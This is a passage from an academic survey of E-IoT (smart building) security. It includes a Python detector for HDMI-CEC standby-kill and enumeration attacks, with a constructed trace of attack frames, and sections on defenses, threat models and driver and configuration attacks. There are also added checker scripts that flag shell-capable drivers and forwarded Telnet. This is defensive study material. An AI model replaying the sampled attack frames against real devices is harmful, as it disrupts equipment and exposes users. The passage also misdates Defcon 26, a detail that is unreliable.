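    # Rule 2: Standby sent to the TV shortly after the TV signals that it is powering up, repeatedly
    kills, last_tv_power_up = [], None
    for t, f in frames:
        tv_powering_up = f["initiator"] == 0 and (
            f["opcode"] == 0x84 or (f["opcode"] == 0x90 and f.get("power_status") == STANDBY_TO_ON))
        if tv_powering_up:
            last_tv_power_up = t
        elif (f["opcode"] == 0x36 and f["destination"] in (0, 15) and f["initiator"] != 0
              and last_tv_power_up is not None and t - last_tv_power_up <= kill_window_ms):
            kills.append((t, f["initiator"]))
    if len(kills) >= kill_threshold:
        alerts.append({"rule": "cec_power_on_kill", "initiator": kills[-1][1], "count": len(kills), "at_ms": kills[0][0]})
    return alerts


# Constructed bus trace as (milliseconds, frame); not a real capture
SAMPLE_TRACE = [
    (0,     "0f:84:00:00:00"),          # TV boots and broadcasts its physical address 0.0.0.0
    (150,   "40:36"),                   # Playback1 (the inserted device) puts the TV back into standby
    (8000,  "0f:84:00:00:00"),          # user powers the TV on again
    (8120,  "40:36"),                   # ... and it is killed again
    (20000, "40:46"), (20010, "41:46"), (20020, "43:46"), (20030, "45:46"), (20040, "48:46"),
    (20050, "40:8c"), (20060, "40:9f"), (20070, "40:8f"),   # Playback1 enumerates every device
    (20200, "04:47:42:52:41:56:49:41"), # TV -> Playback1: OSD name "BRAVIA" (constructed reply)
    (20210, "04:87:01:02:03"),          # TV -> Playback1: vendor id 010203 (constructed)
    (20220, "04:90:00"),                # TV -> Playback1: power status On
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_TRACE):
        print(alert)
```

Both rules work on header and opcode alone, which is why a passive tap on the bus is enough; the decoder's operand fields (OSD name, vendor id, power status) are the same details an enumerating attacker collects, so logging them also shows what an inserted device can learn.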
D. Mitigation of Communication Layer Attacks.
Serial-based Communication Defenses.
While not specific to E-IoT, research on serial-based communication defense mechanisms may apply to E-IoT. Studies by Dudak et al. [271] and Wilson et al. [272] provide insight into securing serial-based protocols and the considerations that must be taken to design protocols securely. Further, as standardization may help secure serial-based communication in ICS, the IEEE 1711.2 working group's efforts have focused on creating the Secure SCADA Communications Protocol [273]. A similar approach has not yet been taken for proprietary E-IoT communication protocols, but it could guarantee interoperability and secure protocol design in the future. In a survey by Volkova et al. highlighting attacks and defenses [160], the authors noted that network security, best practices, and software updates may help mitigate threats to Modbus and similar serial-based protocols. However, the authors also noted that, even with existing mitigation strategies, some vulnerabilities can only be mitigated in the protocol specifications themselves. Finally, many proprietary protocols require physical access to compromise, so controlling physical access to the wiring is a viable mitigation strategy.

For building automation protocols, vulnerabilities are often dependent on the implementation and installation. ASHRAE, the standards body behind BACnet, has released an addendum that adds a security layer to the protocol for BACnet networks [274]. In the addendum, ASHRAE acknowledges the need to update the 56-bit DES cipher used for communication since 2004 to 128-bit AES. As several weaknesses have been found in DES, such protocol updates are needed. More recently, ASHRAE has published BACnet Secure Connect (BACnet/SC), which carries BACnet over TLS-protected WebSocket connections; where equipment supports it, integrators should prefer it over unprotected BACnet/IP. Further, the BACnet specification explicitly notes that BACnet security is optional and that enabling it depends on the integrator. To keep E-IoT systems and related components secure, integrators should configure systems to use the available encryption. Further, entities that create and maintain communication standards must update their protocols to newer cryptographic standards.
WiFi Defenses.
As with many technologies, one of the best defenses against WiFi and other wireless vulnerabilities is ensuring that the most secure protocol implementations available are in place on E-IoT devices. For instance, the WPS weaknesses exploited by Reaver have been patched in many modern routers [170]. The literature also references experimental defense mechanisms (e.g., custom key generation practices, modified WiFi standards); however, as most vendors and integrators cannot realistically implement these mechanisms, they are outside the scope of this survey [175]. As with the network configuration of individual devices, integrators should follow accepted best practices when configuring WiFi security, such as those suggested by the United States Federal Trade Commission [166]. For instance, access to a network should be limited, and routers should be secured with strong passwords, custom SSID names, and protected management features. Strong passphrases mitigate handshake cracking and brute-force attacks on WPA/WPA2-Personal, since the offline attack is bounded only by the attacker's ability to guess the passphrase. WEP is insecure and outdated, and it should be avoided unless absolutely necessary. Other best practices were highlighted by the Cybersecurity & Infrastructure Security Agency (CISA) [167], including installing firewalls, maintaining anti-virus software, updating networking equipment frequently, and following wireless configuration recommendations from manufacturers. Several attacks can be prevented through best practices and proper configuration of WPA/WPA2 devices. For instance, disabling WPS in routers prevents the Reaver and Pixie-Dust attacks [275]. Surveys on WiFi security also suggest that, where possible, users should update their systems to the latest WPA3 standard, while acknowledging that this is not feasible in all cases [165], [176]. Further, these surveys note that proper configuration of WPA3 can prevent key cracking attacks.
ZigBee/Z-Wave Defenses.
One of the best solutions to ZigBee and Z-Wave protocol vulnerabilities is verifying that vendors use the latest and most secure protocol implementations. Further, E-IoT integrators should follow the best practices offered by E-IoT vendors and manufacturers. A survey by Lounis et al. highlighted how updated protocols have resolved many attacks on short-range wireless protocols [176]. This survey also highlights that network administrators (integrators, in E-IoT systems) should monitor and verify that devices are properly configured and updated. However, as users and integrators of E-IoT systems rely on E-IoT device manufacturers and vendors, solutions for vulnerabilities will come from vendor updates and best practices. For instance, manufacturers of E-IoT controllers must make sure that short-range wireless nonces are not reused, to prevent key generation attacks [177], and that a frame's counter is recorded only after its integrity code has been verified, so that an unauthenticated frame cannot advance the stored counter and lock out legitimate nodes. Additionally, work by Benzaid et al. highlighted that polling messages and responses should also be authenticated to prevent spoofing attacks on short-range wireless networks [178]. An article published in 2006 on Z-Wave security highlighted the main differences between ZigBee and Z-Wave security [179]. The article noted that Z-Wave encryption is optional and, for that reason, should always be enabled as a security measure. The study also noted that older Z-Wave systems are open to various attacks, especially if encryption has not been enabled. As such, keeping systems properly updated and securely configured should be a priority for E-IoT communication.
Bluetooth Communication Defenses.
As with other wireless defenses, one of the best solutions for Bluetooth attacks is applying updates and making sure that best practices are followed in Bluetooth configuration. A set of Bluetooth-specific best practices has been proposed in [189]: for instance, disabling Bluetooth functions when they are not in use, disabling device ID broadcast, using strong passwords, and verifying incoming transmissions have been suggested to mitigate Bluetooth-based threats. Further, a survey by Lounis et al. [176] notes that Bluetooth software updates are necessary to defend against well-known Bluetooth attacks (e.g., bluechopping, bluecutting, bluedepriving).
IR Communication Defenses.
As IR communication is line-of-sight, physical security may be one of the best defense approaches. With very little literature on IR communication defenses, integrators may cover IR receivers when not in use to prevent attackers from tampering with devices. Further, access control may prevent unauthorized users from disrupting the operation of E-IoT-controlled devices using IR emitters. As IR requires line of sight, it may be easy to discern when an attacker is meddling with a device. Further, as CCTV cameras are typically sensitive to the near-infrared spectrum, it may be possible to use cameras to identify an attacker using IR to communicate with devices [276].
General Wireless Communication Defenses.
Securing wireless communication against jamming attacks has been a topic of research, with a number of different approaches suggested. Numerous surveys are available on wireless jamming defenses and countermeasures [207]–[210], [213]–[216]. As such, a solution for E-IoT deployments will depend on the wireless technology used and the particular wireless use cases. A survey on this topic by Aristides et al. divides anti-jamming approaches into three types: proactive, reactive, and mobile agent-based solutions [209]. Proactive countermeasures run continuously in the background, cannot be initiated, stopped, or resumed on demand, and require prolonged implementation time and high implementation cost; examples are software- and hardware-based solutions that defend against jamming before it occurs (e.g., DEEJAM) [277]. Reactive anti-jamming approaches reduce computation and energy costs compared to proactive countermeasures, as they are triggered by an ongoing jamming attack and aim to mitigate it (e.g., JAM) [278]; however, for some jamming attacks, reactive anti-jamming may incur detection delays. Finally, mobile agent-based solutions employ anti-jamming agents that move between hosts to detect jamming attempts. For different protocols, there exist different jamming approaches, subject to surveys of their own. Vendors of E-IoT should consider the best defenses for their supported devices and implement them in their systems.
HDMI-based Communication Defenses.
While HDMI sub-protocols are usually secured through restrictions to physical access, other options have been explored. For instance, in work proposed by Puche et al., the authors created a passive intrusion detection system framework designed to protect against HDMI-based threats [221]. The framework uses features in CEC communication to build a machine learning classifier and does not require modification to the original protocol, as a modification to the protocol is problematic, with billions of HDMI devices distributed worldwide. Physical defenses against these attacks involve the use of CEC-less adapters, which can prevent CEC signals from propagating over large distributions [279]. As such, an integrator may use a CEC-less adapter to prevent public, easily-reachable HDMI endpoints from receiving CEC communication.

VI. MONITORING AND APPLICATIONS LAYER
In this section, we highlight the monitoring and applications layer of E-IoT systems. First, we cover elements of the E-IoT monitoring and applications layer. We then introduce the threat model at this layer. Third, we cover monitoring and applications-layer threats and attacks. Finally, we provide relevant defenses and mitigation mechanisms. An overview of attacks, threats, and mitigation strategies covered in this section is outlined in Table VI.

Submitted to Elsevier AdHoc Networks. L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac

TABLE VI: Summary of E-IoT Application Layer Attacks, Threats, and Mitigations.

| Component | Attack/Threat | Mitigations |
| --- | --- | --- |
| E-IoT Drivers | Driver-based Attacks [280] | Treat drivers as untrusted software, avoid unverified drivers, user awareness [280]. |
| E-IoT Software & Services | Software Vulnerabilities [281]–[284] | Frequent updates, isolated E-IoT devices, legacy equipment considerations, vulnerability awareness [285]. |
| E-IoT Software & Services | Improper Encryption [286]–[288] | Accepted encryption methodology, software verification [287]. |
| E-IoT Configuration | Remote Hijacking [289], [290] | Strong passwords, avoid port forwarding, VPNs, configuration best practices [291]–[293]. |
A. Elements of the Monitoring and Applications Layer
The E-IoT Monitoring and Applications Layer consists of E-IoT drivers, E-IoT software and services, and E-IoT configuration.
E-IoT Drivers.
As introduced in Section II, drivers are an important part of E-IoT system functionality. As a software-based component of E-IoT systems, drivers provide all the information necessary for an E-IoT system to integrate a device or web service into the system. As such, E-IoT drivers are not standardized from system to system and may be known under a different name (e.g., Crestron modules, Control4 drivers) [280]. Drivers are inserted and configured in an E-IoT system during programming or maintenance by integrators. Drivers can be obtained in three different ways. (1) Drivers may be acquired directly from the E-IoT configuration software. (2) Drivers may be acquired from a catalog of drivers provided by the main E-IoT vendor. (3) Drivers can be downloaded from third-party sites (e.g., forums, device vendors, third-party developers). However, while many vendors will validate drivers acquired from their software or repositories, drivers from third-party sources are often not checked for malicious content. Additionally, some drivers are not free, which may tempt integrators to use a free, unverified driver with malicious code available online [41].
E-IoT Software Services.
E-IoT systems use several software services for configuration and maintenance. Beyond proprietary tools used by E-IoT vendors, such as Control4's Composer and Crestron's SIMPL, E-IoT uses common application services [294], [295]. Available software services may vary from system to system. While E-IoT systems may have well-known, documented software services such as File Transfer Protocol (FTP), Secure Shell (SSH), and Telnet communication, E-IoT solutions may also run unknown proprietary services. With the closed-source nature of many E-IoT systems, documentation and details of these proprietary services remain mostly unavailable. As such, operating manuals available online and troubleshooting guides are among the few sources of information on these services. In contrast, well-known and commonly-used services are easier to identify. For instance, file transfer is necessary for E-IoT tasks such as firmware upgrades, image uploads, and vendor software configuration. As such, one of the accepted file-transfer services is FTP, and for more secure communication, Secure FTP (SFTP) [296], [297]. Another requirement for E-IoT is diagnostics and configuration; thus, integrators need to communicate directly with the E-IoT system. Secure shell services may be used for diagnostics and configuration, as integrators use clients such as PuTTY to connect to, diagnose, and configure E-IoT systems and system components through services such as Telnet or SSH [298], [299]. Another use-case of software services is webservers and web interfaces using HTTP or HTTPS. E-IoT systems may host webservers and web interfaces to allow integrators to configure, diagnose, or monitor devices. For instance, CCTV systems host a web interface to configure cameras, view recordings, view a live feed, and manage CCTV systems [300].
Finally, software suites such as BusyBox are common in IoT and E-IoT alike, as BusyBox provides many common UNIX utilities in a compact executable with size optimization and a modular design [301], [302]. Due to this convenient design, E-IoT vendors such as Control4 run BusyBox on their main controllers and devices [303].
E-IoT Configuration.
Beyond software, the configuration of E-IoT systems can impact the overall security of the system. Some E-IoT users may need to access E-IoT system features remotely. Additionally, remote access aids integrators, as it allows them to provide remote technical support, especially in moving installations such as yachts. As such, E-IoT vendors and integrators permit remote access through a variety of different methods. While the configuration is different for each system, most E-IoT systems are accessed remotely through subscription services, virtual private networks (VPNs), or port forwarding. First, some vendors offer subscription services, creating a secure and easy way for clients and integrators to connect remotely to an E-IoT system (e.g., Control4's 4Sight) [304]. VPNs are another popular solution recommended by many vendors, granting users remote access to the E-IoT network and equipment. For this reason, vendors will recommend routers with VPN functionality to integrators. Finally, as E-IoT devices (e.g., controllers, CCTV NVRs) often use ports for control and configuration, integrators often port forward these devices to allow remote access [291], [300], [305].
B. Threat Model for E-IoT Monitoring and Applications Layer
For monitoring and applications layer threats, we consider Mallory, an attacker knowledgeable on configuration and software vulnerabilities of E-IoT systems. As such, an attacker on this layer compromises E-IoT functionality and may gain access to unauthorized resources without any physical contact with E-IoT systems. For this layer, an attacker needs technical knowledge of E-IoT systems and software-based attacks. Mallory can be in the roles of malicious users, integrators, or remote attackers.
Users.
Mallory, in the role of a frequent or visiting malicious user, could attack E-IoT systems through the monitoring and applications layer. As malicious actors, these users may attempt privilege escalation, modify E-IoT systems, or otherwise try to cause unintended operation. As regular users are meant to operate E-IoT systems and not alter any configuration, vulnerabilities may allow Mallory to compromise E-IoT system components as an unprivileged user. Further, in an improperly configured network, if Mallory has network access and proprietary configuration software, she may modify E-IoT software, remote access configuration, or compromise an E-IoT system through software (e.g., malicious drivers).
Integrators.
Integrators often will have full access to E-IoT systems. As a malicious integrator, Mallory may become the attacker in certain situations (e.g., bribed or disgruntled employees [306]). In this scenario, Mallory already has the proprietary tools and access to one or many E-IoT systems through maintenance software. Mallory could inadvertently compromise multiple systems using malicious drivers or remote access tools. Further, Mallory may target wealthy or famous clients and eavesdrop on information for personal gain or otherwise disrupt E-IoT system operation.
Remote Attackers.
Mallory may be a remote attacker seeking systems to compromise. She may find E-IoT systems exposed to the Internet. If Mallory is a more capable attacker, she may use configuration tools and manuals used by E-IoT vendors to gain complete access to E-IoT systems, install malicious E-IoT drivers, and otherwise compromise exposed systems.
C. Monitoring and Applications Layer Attacks and Vulnerabilities
In this subsection, we cover monitoring and applications layer attacks and vulnerabilities.
E-IoT Driver Attacks.
As explained in Section II, E-IoT drivers contain all the programming necessary for E-IoT systems to integrate third-party components such as devices, APIs, and web services [294], [307]. Research on the topic of E-IoT drivers by Puche et al. demonstrated that drivers can be used to compromise E-IoT systems [280]. Specifically, the authors performed a DoS attack, maliciously expended system resources, and assumed control of the E-IoT controller's networking functions through malicious E-IoT drivers. The authors note that an integrator may inadvertently compromise an E-IoT system by downloading unverified drivers from third-party vendors, forums, or any external site. Since there is no verification mechanism for drivers in E-IoT controllers, an attacker can gain control of the E-IoT system.
E-IoT Software Service Attacks.
E-IoT systems will run a combination of proprietary services and well-known services in their devices. As such, some vulnerabilities have been exposed by researchers on E-IoT systems. For instance, at Defcon 26 (2017), Lawshae et al. presented several Crestron controller vulnerabilities [281]. Specifically, Crestron controllers could be compromised through the CTP console, a Telnet-like interface for Crestron E-IoT systems used to configure and diagnose Crestron devices. This interface also allowed Lawshae to have direct chip communication, browser remote control, UI interaction, and microphone recording capabilities. Further, as of the time of this writing, CVE Details shows over twenty vulnerabilities for Crestron devices and six for Savant systems [282], [283]. For Savant and Crestron systems, these vulnerabilities include de-authentication code overflow, authentication bypass, remote code execution, directory traversal, cross-site request forgery, and DoS. Vulnerabilities have also been discovered in presentation devices and systems. For instance, Crestron presentation devices, Barco wePresent, and Extron ShareLink presentation systems have had numerous vulnerabilities discovered (e.g., stack overflows, unauthenticated command injection) as they all share underlying code [284]. Vulnerability research by Synack, a company that specializes in security research, tested the now discontinued SR-250 Control4 controllers and found several unpatched vulnerabilities described as unauthenticated management vulnerabilities [286]. Moreover, improper implementation of encryption could threaten the confidentiality and integrity of E-IoT data. Practices such as 'rolling your own encryption' (e.g., implementing self-made cryptographic functions and algorithms) have left products from companies (e.g., Dualcom, Telegram) vulnerable to attackers [287].
For instance, Dualcom alarm signaling products were demonstrated to be vulnerable and susceptible to cracking attacks due to improper use of encryption mechanisms [288]. As such, improperly implemented encryption can open up E-IoT components to a great number of attacks (e.g., malicious sniffing, brute-force, man-in-the-middle, replay).
E-IoT Configuration Attacks.
One of the most notable examples of a failure in IoT security was made abundantly clear with the Mirai botnet, which overwhelmed high-profile targets through DDoS attacks. The malware hijacked exposed IoT devices and used them to create a botnet. How the Mirai malware grew to a peak of six-hundred thousand infections so quickly is one of the reasons why users should be wary of the security of their connected E-IoT systems and other Internet-facing devices [289]. Research on this botnet revealed issues with the current state of exposed IoT and E-IoT devices. Mirai created a bank of targeted devices with 46 unique passwords. Most of these passwords targeted exposed systems such as security cameras, CCTV video recorders, routers, and printers. Initially, Mirai used this bank of default passwords to brute-force through Telnet and SSH authentication. Future iterations of Mirai altered themselves to attack through known exploits in targeted systems. Attacks such as these could also take advantage of known backdoors, such as those seen in Dahua DVRs and IP cameras, where a firmware update had to be released for all installed devices due to found vulnerabilities [290]. An attacker could compromise an E-IoT system through port-forwarded devices. As of the writing of this paper, a search in Shodan.io, a search engine for exposed devices connected to the Internet, reveals over 30,000 E-IoT devices exposed online from major vendors (Control4, Crestron, Savant, and Lutron) [308].
D. Mitigation of Monitoring and Applications Layer Attacks
Driver Defenses.
E-IoT vendors will often provide a number of drivers or validate drivers developed by third parties. As such, integrators should try to use validated drivers to prevent driver-based threats. The work that presented driver-based attacks highlighted that vendors should approach drivers in a similar manner to untrusted software [280]. Further, without standardization, drivers are implemented differently in each system; thus, security mechanisms that are viable for one E-IoT system may not be viable for others. A proposed solution is a permission system for drivers, based on the function and what a driver should be allowed to do (e.g., a serial-based controlled device should not have a driver with network connectivity) [280]. Finally, many users and integrators may not be aware that malicious code could exist in drivers and thus, awareness of this possible threat is one of the best and only current defenses.
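The driver permission system proposed above can be sketched as a policy check at driver load time. The following is an added example written for this survey, not code from [280] or from any E-IoT vendor; the device classes, capability names, manifest format and `vendor_signed` flag are all constructed for illustration.

```python
"""Added example (not from the survey or any E-IoT vendor): a minimal
permission check for E-IoT drivers, following the idea in the text that a
driver's allowed capabilities should follow from the kind of device it
controls. All device classes, capability names and driver manifests below
are constructed for illustration."""
from dataclasses import dataclass, field

# Hypothetical capability vocabulary a driver manifest could declare.
CAP_SERIAL = "serial"
CAP_IR = "ir"
CAP_NETWORK = "network"
CAP_FILESYSTEM = "filesystem"
CAP_SHELL = "shell"

# Constructed policy: which capabilities each device class legitimately needs.
# A serial-controlled display gets serial only; an IP camera driver needs
# network access but never shell or filesystem access on the controller.
POLICY = {
    "serial_display": {CAP_SERIAL},
    "ir_receiver": {CAP_IR},
    "ip_camera": {CAP_NETWORK},
    "web_service": {CAP_NETWORK},
}

@dataclass
class DriverManifest:
    name: str
    device_class: str
    capabilities: set = field(default_factory=set)
    vendor_signed: bool = False   # True only when the vendor validated it

@dataclass
class Verdict:
    allowed: bool
    reasons: list

def evaluate_driver(manifest: DriverManifest, allow_unsigned: bool = False) -> Verdict:
    """Return whether the driver may be loaded, and why not if denied.

    Drivers are treated as untrusted: unknown device classes and any
    capability outside the class policy are denied, and unsigned third-party
    drivers are denied unless the integrator explicitly opts in."""
    reasons = []
    allowed_caps = POLICY.get(manifest.device_class)
    if allowed_caps is None:
        reasons.append(f"unknown device class '{manifest.device_class}'")
        allowed_caps = set()
    excess = sorted(manifest.capabilities - allowed_caps)
    if excess:
        reasons.append(
            f"capabilities {excess} not permitted for '{manifest.device_class}'"
        )
    if not manifest.vendor_signed and not allow_unsigned:
        reasons.append("driver not validated by vendor; unsigned drivers are rejected")
    return Verdict(allowed=not reasons, reasons=reasons)

def load_drivers(manifests, allow_unsigned=False):
    """Evaluate a batch of drivers; returns {name: Verdict}."""
    return {m.name: evaluate_driver(m, allow_unsigned) for m in manifests}

if __name__ == "__main__":
    # Constructed manifests: a vendor-signed projector driver, and a free
    # third-party projector driver that also asks for network and shell
    # access, the pattern the text warns about.
    samples = [
        DriverManifest("Projector-Serial", "serial_display", {CAP_SERIAL}, True),
        DriverManifest("Projector-Free", "serial_display",
                       {CAP_SERIAL, CAP_NETWORK, CAP_SHELL}, False),
    ]
    for name, verdict in load_drivers(samples).items():
        print(name, "ALLOW" if verdict.allowed else "DENY", verdict.reasons)
```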
E-IoT Software and Services Defenses.
In a similar manner to any smart system, vendors, users, and integrators should follow patching and firmware best practices. As E-IoT vendors will note and often patch vulnerabilities with later releases, integrators should install the latest software and firmware versions. Moreover, users should schedule frequent product updates [285]. Following frequent updates and patching in E-IoT systems can help mitigate known vulnerabilities in software services. Further, overall awareness of running services and versions can help integrators gauge the risk of exposing E-IoT components to a network. It may be possible to anticipate unpatched vulnerabilities and prevent an attack before it occurs. As such, integrators may want to isolate E-IoT systems from other networked systems (e.g., guest-accessible networks) and enable proper network-based mechanisms to prevent unauthorized access. Additionally, legacy and discontinued equipment that cannot be upgraded or updated presents a major threat to many smart systems beyond E-IoT, especially Internet-facing systems. Integrators need to be aware of legacy equipment and make sure that their clients are aware of the risks of legacy equipment. Finally, E-IoT developers should avoid mistakes during development such as improper encryption mechanisms by using the latest libraries, avoiding custom encryption, and following verification processes [287].
E-IoT Configuration Defenses.
E-IoT vendors will often release security best practices, and integrators should follow these best practices for configuring E-IoT systems [291]. Moreover, installers and users should avoid weak and insecure passwords, as Internet-facing devices with weak password practices have allowed attackers to compromise devices in previous large-scale automated attacks [289]. A whitepaper published by Synack provided an outline relevant to E-IoT and professionally-installed systems [292]. Proposed best practices from this guide highlighted that vendors and manufacturers should not rely on users for security. Basic password strength requirements should be enforced, as compromising a remote access account could give an attacker access to an E-IoT system. Users should also receive notifications when device statuses change or when sessions are initiated. Finally, the whitepaper notes that vendors should avoid SSL pinning, self-signed certificates, and custom encryption. One other source of vulnerabilities is port forwarding, which exposes devices to the Internet. E-IoT vendors have always advised dealers and users not to port forward devices, as some devices were not designed to be exposed directly to the Internet [293]. Instead, integrators and users should opt for VPN configuration or vendor remote access services.
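The two configuration problems this subsection returns to, management ports forwarded to the Internet and weak or default passwords, lend themselves to an automated check an integrator could run before handing over a deployment. The following is an added example written for this survey, not a vendor's tool; the device inventory, forwarding rules, password rules and the small default-password list are constructed for illustration.

```python
"""Added example (not from the survey or any vendor's tooling): a small
audit of an E-IoT remote-access configuration that flags port forwarding
of device management services and weak passwords, and points to VPN or
vendor remote-access services instead, as the text recommends.
The inventory, forwarding rules and password rules are constructed."""
from dataclasses import dataclass

# Management services the text lists for E-IoT devices (FTP, SSH, Telnet,
# HTTP/HTTPS). Telnet, FTP and plain HTTP carry credentials in cleartext.
MANAGEMENT_PORTS = {21: "FTP", 22: "SSH", 23: "Telnet", 80: "HTTP", 443: "HTTPS"}
CLEARTEXT_PORTS = {21, 23, 80}

# Constructed illustrative list of credentials an installer might leave in
# place; real attack password banks are deliberately not reproduced here.
DEFAULT_PASSWORDS = {"admin", "password", "1234", "12345", "default"}

@dataclass
class Device:
    name: str
    kind: str          # constructed labels, e.g. "controller", "nvr"
    password: str

@dataclass
class ForwardRule:
    external_port: int
    device: str
    internal_port: int

def password_findings(dev):
    """Weak-password checks: default credentials and short passwords."""
    out = []
    if dev.password.lower() in DEFAULT_PASSWORDS:
        out.append(f"{dev.name}: default password in use")
    elif len(dev.password) < 12:
        out.append(f"{dev.name}: password shorter than 12 characters")
    return out

def forwarding_findings(rules, devices):
    """Flag forwards that expose a device management service to the Internet."""
    by_name = {d.name: d for d in devices}
    out = []
    for r in rules:
        dev = by_name.get(r.device)
        target = dev.name if dev else f"unknown device '{r.device}'"
        svc = MANAGEMENT_PORTS.get(r.internal_port)
        if svc is None:
            continue  # not a known management service
        sev = "HIGH" if r.internal_port in CLEARTEXT_PORTS else "MEDIUM"
        out.append(f"{sev}: {target} {svc} (port {r.internal_port}) forwarded "
                   f"from external port {r.external_port}; use VPN or vendor remote access")
    return out

def audit(devices, rules):
    """Return all findings; an empty list means nothing was flagged."""
    findings = []
    for d in devices:
        findings.extend(password_findings(d))
    findings.extend(forwarding_findings(rules, devices))
    return findings

if __name__ == "__main__":
    # Constructed deployment: a controller with a default password and Telnet
    # forwarded, and an NVR with a strong passphrase and HTTPS forwarded.
    devices = [Device("ctrl-1", "controller", "admin"),
               Device("nvr-1", "nvr", "Long-Unique-Passphrase-42")]
    rules = [ForwardRule(2323, "ctrl-1", 23), ForwardRule(8443, "nvr-1", 443)]
    for f in audit(devices, rules):
        print(f)
```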
VII. BUSINESS LAYER
In this section, we highlight the E-IoT business layer and common security concerns. Specifically, we first address common business-layer components of E-IoT systems. Second, we highlight possible threats and attacks. Finally, we cover possible defense and mitigation mechanisms. An overview of components, threats, attacks, and mitigations discussed in this layer can be found in Table VII.
A. Elements of the E-IoT Business Layer
In this subsection, we highlight common elements of the E-IoT Business Layer.
Security Cloud Services.
E-IoT CCTV systems usually record camera footage in local hard disk storage in a Digital Video Recorder (DVR) or a Network Video Recorder (NVR) for analog or IP cameras, respectively [324]. However, if a DVR or NVR is damaged or stolen in traditional systems, all video recordings are lost. Moreover, CCTV systems have limited storage space and will often overwrite old recordings with new footage once storage runs out. As a solution to this issue, vendors offer online cloud storage solutions designed specifically for security cameras and CCTV. In addition to cloud storage, security cloud services allow integrators and users to manage multiple E-IoT deployments from a single hub. For instance, services beyond cloud storage include health checks, remote access, and remote camera control for the end-user. Another feature of security cloud services is machine-learning-based tagging and human activity recognition on recorded video, with providers such as Camio providing these features [46]. With this feature, recorded video data can be labeled by events (e.g., van passing, pizza delivery, red shirt), allowing users to search for a specific event in stored recordings easily [325], [326].
Vendor Services.
E-IoT vendors will often offer cloud services for monitoring and maintenance of E-IoT systems. These services serve a variety of purposes, as maintenance is an important part of E-IoT deployments. First, maintenance services monitor integrated devices in the E-IoT system network. As such, an integrator can know when a device falls offline and can address the issue before a client notices. Second, maintenance services can send integrators and clients phone and email notifications on needed updates, unplanned downtime, Internet failure, and ongoing network issues. Services such as Pakedge's BakPak are designed to work with E-IoT and provide vendors with many features. As such, they allow integrators to provide remote support, monitoring, and maintenance to multiple user E-IoT systems [327]. Cloud services are also used in E-IoT for secure remote access to E-IoT systems. While not all E-IoT systems offer this service, major E-IoT vendors or device makers always offer some form of remote access solution. For instance, services such as Control4's 4Sight offer users remote access through mobile apps and cloud support. Further, 4Sight also allows integrators to service a specific E-IoT system remotely through a secure connection.
B. Threat Model for E-IoT Business Layer
For this layer, we consider Mallory compromising an E-IoT system through the E-IoT Business layer. As such, Mallory is knowledgeable about cloud and remote services. Specifically, Mallory knows how to use business layer services (e.g., security cloud, vendor maintenance) to compromise one or multiple E-IoT systems remotely. As an attacker, in addition to knowledge on integrated services, Mallory must possess an Internet connection, knowledge on business services, and capabilities to perform phishing attacks, dictionary attacks, or web-based attacks. Mallory can be in the roles of hackers or integrators to target the business layer of E-IoT.

TABLE VII: Overview of E-IoT Business Layer Attacks, Threats, and Mitigations.

| Component | Attack/Threat | Mitigations |
| --- | --- | --- |
| Security and vendor cloud services | Data Breaches [309]–[322] | Storage encryption, strong access control, accepted authentication practices, server-side encryption. |
| Security and vendor cloud services | Insecure APIs and Web Services [309]–[322] | Vulnerability scanning, malware protection, browser updates, data sanitation, web development best practices. |
| Security and vendor cloud services | Unauthorized Intrusion [309]–[318] | Network-based, host-based, distributed, and hypervisor IDS. |
| Security and vendor cloud services | Account Hijacking [309]–[322] | Strong access control and authentication, two-factor authentication, web development best practices [317], [323]. |
| Security and vendor cloud services | DoS Attacks [309]–[322] | Rate-limiting, structured schemes, crypto puzzles, proxy filtering, load balancing, reputation-based access control, and flexible network configuration [317], [323]. |
Hackers.
In this scenario, Mallory may be a remote attacker with or without prior knowledge of E-IoT systems. Mallory may target E-IoT cloud and vendor services and disrupt these systems. If Mallory is a more knowledgeable attacker, she may be aware that E-IoT systems can be compromised through management services. Mallory may acquire sensitive information from E-IoT systems such as CCTV recordings, schedules, and E-IoT usage patterns. Further, Mallory can also use phishing techniques (e.g., texting, email, apps) to obtain a user's or integrator's credentials and compromise one or multiple systems.
Malicious Integrators.
Mallory may be a malicious integrator or an insider in an integrator company with access to user accounts and credentials for remote support. As such, Mallory can become a malicious actor (e.g., disgruntled employees, insiders) and compromise a user's E-IoT system for disruption or personal gain. Additionally, as Mallory is an integrator or an employee, she may know an E-IoT user's financial or societal status. This may tempt Mallory to sell information (e.g., passwords, accounts, CCTV footage) of users to external attackers for financial gain.
C. Business Layer Attacks and Vulnerabilities
Cloud Attacks.
As cloud services are a part of E-IoT, cloud service threats and attacks are relevant to E-IoT systems. While architectures may vary from system to system and service to service, threats to integrated cloud services could negatively impact E-IoT system security. As an active topic of research, several surveys have highlighted threats, attacks, and best practices in cloud computing [309]–[322]. Relevant to E-IoT, surveys by Liu et al., Ryan, and Shazad have highlighted several key challenges to cloud security [310]–[312]. For instance, these studies suggest that cloud components are susceptible to DDoS attacks and that encryption solutions will not protect sensitive data if the cloud provider cannot be trusted due to insiders. A comprehensive survey by Fernandes et al. raised additional issues which may occur with cloud computing [317]. Issues related to unreliable computing, data storage, availability, cryptography, sanitation, and malware can arise from systems that rely on cloud services. Further, this survey highlights how keyloggers, phishing, malicious redirects, URL-guessing attacks, browser vulnerabilities, cross-site scripting, XML/SAML wrapping attacks, and MitM attacks may impact cloud services. Finally, a survey by Kumar et al. highlights some of the common cloud security threats, such as data breaches, weak access control, insecure APIs, application vulnerabilities, account hijacking, malicious insiders, advanced persistent threats (APT), data loss, nefarious use of cloud services, DoS, and DDoS [323]. In terms of E-IoT, these threats could mean that E-IoT users may lose access to their accounts, face information theft, or experience system downtime from integrated or vendor-provided cloud services.
D. Mitigation of Business Layer Attacks
Cloud Defenses.
